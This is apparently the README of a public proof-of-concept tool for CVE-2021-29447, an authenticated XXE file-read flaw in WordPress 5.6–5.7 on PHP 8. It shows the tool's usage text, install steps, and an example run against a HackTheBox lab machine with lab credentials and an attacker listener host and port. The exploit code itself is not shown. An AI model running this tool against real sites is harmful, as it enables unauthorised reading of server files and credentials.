CVE-2021-29447 - Authenticated XXE Injection - WordPress < 5.7.1 & PHP > 8 # CVE-2021-29447
POC to exploit WordPress 5.6-5.7 (PHP 8+) Authenticated XXE Injection. More about this CVE [here](https://www.sonarsource.com/blog/wordpress-xxe-security-vulnerability/)
## Example
Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress website with Media Library vulnerable to XXE Injection.
```bash
python lfi.py -u manager -p partylikearockstar -t metapress.htb -lh 10.10.XX.XX -lp 8081 -w file_wordlist
```
[](https://asciinema.org/a/wqBueScWdUnuG4HzHbYPuOThI)
## Usage
```bash
usage: lfi.py [-h] -u USERNAME -p PASSWORD -t TARGET -lh LHOST [-lp LPORT] [-w WORDLIST] [-i] [-v] [-s]
[filenames ...]
positional arguments:
filenames Filenames to fetch
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Username to user in authenticated upload
-p PASSWORD, --password PASSWORD
Password to user in authenticated upload
-t TARGET, --target TARGET
Remote host to target, e.g. "metapress.htb"
-lh LHOST, --host LHOST
Hostname on which server is bound (default "")
-lp LPORT, --port LPORT
Listening port (default "8080")
-w WORDLIST, --wordlist WORDLIST
Wordlist of filenames to be fetched
-i, --interactive Runs in interactive mode
-v, --verbose Enables verbose mode
-s, --skip Skip php server spin-up (MAKE SURE IT IS ALREADY RUNNING!)
```
## Installation
**Make sure you have php installed.**
```bash
git clone https://github.com/viardant/CVE-2021-29447
cd CVE-2021-29447
pip install -r requirements.txt
```
[4.0K] /data/pocs/dbf0f754cbfd94c3ef9b1854d249a5b7ae3f5231
├── [ 434] grab.php
├── [ 11K] lfi.py
├── [ 34K] LICENSE
├── [1.7K] README.md
└── [ 18] requirements.txt
0 directories, 5 files